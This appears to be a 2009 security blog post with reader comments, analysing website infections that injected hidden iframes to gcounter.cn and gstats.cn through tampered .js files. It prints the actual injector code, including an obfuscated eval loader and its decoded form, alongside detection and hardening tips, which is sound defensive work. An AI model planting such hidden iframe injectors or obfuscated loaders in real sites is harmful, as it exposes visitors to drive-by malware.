Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

GStats .cn and GCounter .cn – Malicious Code in .js Files

   22 Jun 09   Filed in Tips and Tricks, Website exploits

This is probably not a new attack (I found an almost year-old article that mentions gcounter iframes), but I started noticing it this past weekend: first on Google's Webmaster Forums, then in the Unmask Parasites logs. So I guess it's a new wave of the attack.

GCounter .cn

When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found, except for the fact that the domain name was blacklisted by Google. I checked Google's Safe Browsing diagnostic page and found this clue:

Malicious software is hosted on 1 domain(s), including gcounter.cn/.


I opened the site in Firefox and temporarily enabled the site's own domain in NoScript. When the page reloaded, another item appeared in the NoScript menu: "Allow gcounter .cn". Bingo! The iframe was absent while the site's scripts were blocked and appeared as soon as they ran, so the injection is done by JavaScript; and since Unmask Parasites had found nothing in the HTML itself, the malicious code had to be in an external .js file. I downloaded (using wget) all referenced .js files and located the following code in one of them:

if (document.cookie.search("coqwg=3") == -1) { // no marker cookie yet: first visit from this browser
document.write("<i"+"fr"+"ame sr"+"c=http:"+"//"+"gcou"+"nter"+".cn styl"+"e"+"=displa"+"y:no"+"ne>"+"</i"+"fram"+"e>"); // split strings defeat a grep for "iframe" or "gcounter"
document.cookie = "coqwg=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} // mark this browser as already served

As you can see, it injects a hidden iframe that loads content from gcounter .cn.

The code also sets a cookie so that only new visitors get the iframe. This means the NoScript trick will not work a second time if your browser already has that cookie, so clear the site's cookies (or use a fresh profile) before repeating the check.

When I checked another site with gcounter .cn mentioned on the diagnostic page, I also found the malicious code in one of the external .js files.

Note that the code is not simply appended at the very bottom of .js files as in the Gumblar exploit; it is injected somewhere in the middle of legitimate JavaScript code. It may not even occupy a separate line, so it is very easy to overlook.

GStats .cn

Another day I found a site with the following record on Google's Safe Browsing diagnostic page:

Malicious software is hosted on 1 domain(s), including gstats.cn/.

The same NoScript trick revealed the malicious code in external .js files. This time the malicious code was more heavily obfuscated and looked like this:

AA3EC055="p";AA3EC055+="arseI";AA3EC055+="nt";E0B4B25AF7590="Stri";E0B4B25AF7590+="n";E0B4B25AF7590+="g.fr";E0B4B25AF7590+="omCha";
E0B4B25AF7590+="rCo";E0B4B25AF7590+="de";function ACE13AC7F5(A8D133){var DB529=495;DB529=DB529-479;D59CA3C8=eval(AA3EC055+"(A8D133,DB529)");return(D59CA3C8);}
function A230982771962E(D2A369){var DA09B=114;DA09B=DA09B-112;var C8120BEFABE1C="";for(BE4025D=0;BE4025D<D2A369.length;BE4025D+=DA09B){
C8120BEFABE1C+=(eval(E0B4B25AF7590+"(ACE13AC7F5(D2A369.substr(BE4025D,DA09B)))"));}eval(C8120BEFABE1C);}
A230982771962E("…"); // a long string of hexadecimal digits (omitted here)

The wrapper is simple once you read past the random names: the first two variables spell out parseInt and String.fromCharCode from fragments, ACE13AC7F5 is parseInt(x, 16) (495 - 479 = 16), and A230982771962E walks the long string two hex digits at a time (114 - 112 = 2), turns each pair into a character and evals the result. After deobfuscation, the code looked similar to gcounter's:

if (document.cookie.search("jsfx=3") == -1) { xwew=document.getElementById('cmk');if(xwew==null){ // marker cookie absent and iframe not yet on the page
document.write('<iframe id=cmk src=http://gstats . cn style=display:none></iframe>');}
document.cookie = "jsfx=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

No wonder: both gcounter .cn and gstats .cn reside on the same server, with the IP address 92.241.176.101.

The gstats variant differs from the gcounter code above in these ways:

  • the gstats .cn domain is used
  • the code is more heavily obfuscated and changes from site to site
  • the cookie names and the iframe ids also vary from site to site
  • I've seen this code only at the very bottom of .js files, so it may be slightly easier to find.

Modification dates

Another interesting fact about the infected .js files is that they have pretty old modification dates. The newest file had a modification date in February, and the oldest had supposedly not been modified since January 2004. So it looks like the hackers reset the modification time of the files after injecting the malicious code, which means you cannot rely on "recently modified" to find the infected files.

At this moment I don't have any information about how the .js files get infected. I can only guess that it has to do with compromised FTP credentials (as with many other recent attacks).

  • So be sure to check your local computers for malware.
  • Then change all passwords,
  • and refrain from saving them in the programs you use to upload files to a web server (FTP clients, Dreamweaver, etc.).
  • Don't use FTP if you can avoid it: the protocol sends your password in clear text. Use SFTP instead; most decent hosting plans include this option.
  • Browse the web with a secure browser. I recommend the Firefox+NoScript combo.

Have your say

If you have more information about this exploit, please leave your comments here. The more we know about the attack, the better we can withstand it.

P.S. This exploit is not directly detected by Unmask Parasites, since external .js files are not checked. However, some infected sites can be detected as suspicious if Google has already blacklisted them. So click the "details" link next to Google's advisory; if you see gstats .cn or gcounter .cn on the diagnostic page, you know where the malicious code hides.

Update Aug 31, 2009: I've just found a script that injects a hidden gcounter .cn iframe at the bottom of an HTML file. This time it is detectable by Unmask Parasites. So don't forget to check HTML files (all web pages) too.

Reader's Comments (7)

  1.

    Thanks for this.

    My site has been blacklisted by Google. I hope just for a moment.

  2.

    many thanks, you saved my day!

  3.

    ps: if you run a website with TYPO3, look for the script in js-files @ «/typo3temp».

  4.

    Txs for this information. It saved me a lot of work and time.
    Regards
    Paul

  5.

    [...] is some information about GCounter.cn and GStats.cn on the UnmaskParasites-blog. It’s not clear what it does. My computer is still working, so I guess it doesn’t do [...]

  6.

    jeez. how does one search for the expression in our files or database records if the code is split up in who knows what way, and/or obfuscated? i tried using regular expressions, but wow this is difficult.

    good find, but assuming the script may be more sophisticated now, how can we isolate the include?

    •

      You might want to put your files under version control. This way you’ll be able to detect all unauthorized modifications and easily restore a clean version.